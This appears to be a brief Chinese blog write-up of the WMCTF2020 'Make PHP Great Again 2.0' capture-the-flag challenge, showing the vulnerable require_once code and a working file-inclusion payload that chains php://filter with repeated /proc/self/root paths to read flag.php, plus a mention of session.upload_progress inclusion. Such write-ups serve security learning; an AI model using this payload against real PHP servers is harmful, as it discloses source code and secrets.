web | [WMCTF2020]Make PHP Great Again 2.0

开局几行字:

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

参考:https://blog.csdn.net/weixin_48537150/article/details/113189052

PHP最新版的小Trick, require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含
payload:?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

上面的是预期解。

非预期解是利用session.upload_progress进行文件包含。
不再赘述。
over.

posted @ 2021-08-03 17:40  Mz1  阅读(593)  评论(0编辑  收藏  举报